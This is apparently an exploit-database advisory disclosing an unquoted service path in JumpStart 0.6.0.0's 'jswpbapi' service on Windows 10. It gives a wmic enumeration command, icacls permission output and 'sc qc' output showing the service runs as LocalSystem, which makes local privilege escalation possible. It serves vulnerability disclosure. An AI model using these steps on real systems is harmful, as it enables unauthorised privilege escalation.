38 lines
No EOL
1.9 KiB
Text
38 lines
No EOL
1.9 KiB
Text
# Exploit Title: JumpStart 0.6.0.0 - 'jswpbapi' Unquoted Service Path
|
|
# Google Dork: N/A
|
|
# Date: 2019-09-09
|
|
# Exploit Author: Roberto Escamilla
|
|
# Vendor Homepage:https://www.inforprograma.net/
|
|
# Software Link: https://www.inforprograma.net/
|
|
# Version: = 0.6.0.0 wpspin.exe
|
|
# Tested on: Windows 10 Home
|
|
# CVE : N/A
|
|
|
|
###############STEPS##########################
|
|
|
|
# 1.- Install the JumpStart application on Windows 10 Home Operating System
|
|
# 2.- Open our "System Symbol" application.
|
|
# 3.- Execute the command -------wmic service get name, displayname, pathname, startmode | findstr /i "auto" | findstr /i /v "C:\Windows\\" | findstr /i /v """
|
|
# 4.- The following will appear in a list: JumpStart Push-Button Service jswpbapi C:\Program Files (x86)\Jumpstart\jswpbapi.exe
|
|
# 5.- We proceed to verify the process using the command icacls, with which we verify the protection of the directory as shown below:
|
|
|
|
NT AUTHORITY\SYSTEM:(I)(F)
|
|
BUILTIN\Administradores:(I)(F)
|
|
BUILTIN\Usuarios:(I)(RX)
|
|
ENTIDAD DE PAQUETES DE APLICACIONES\TODOS LOS PAQUETES DE APLICACIONES:(I)(RX)
|
|
ENTIDAD DE PAQUETES DE APLICACIONES\TODOS LOS PAQUETES DE APLICACIÓN RESTRINGIDOS:(I)(RX)
|
|
|
|
# 6.- Finally we verify using the command sc qc jswpbapi the protection of the service in which we observe that it is scalable in privileges
|
|
# since the route contains spaces without being in quotes and is in CONTROL_ERROR normal and NOMBRE_INICIO_SERVICIO:
|
|
# LocalSystem as it's shown in the following [SC] QueryServiceConfig CORRECTO
|
|
|
|
NOMBRE_SERVICIO: jswpbapi
|
|
TIPO : 10 WIN32_OWN_PROCESS
|
|
TIPO_INICIO : 2 AUTO_START
|
|
CONTROL_ERROR : 1 NORMAL
|
|
NOMBRE_RUTA_BINARIO: C:\Program Files (x86)\Jumpstart\jswpbapi.exe
|
|
GRUPO_ORDEN_CARGA :
|
|
ETIQUETA : 0
|
|
NOMBRE_MOSTRAR : JumpStart Push-Button Service
|
|
DEPENDENCIAS : RPCSS
|
|
NOMBRE_INICIO_SERVICIO: LocalSystem |